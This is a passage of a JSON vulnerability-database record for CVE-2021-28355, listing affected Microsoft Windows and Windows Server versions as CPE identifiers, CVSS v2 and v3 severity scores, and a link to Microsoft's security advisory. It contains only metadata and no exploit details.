"cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28355", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28355"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "scheme": null}]}
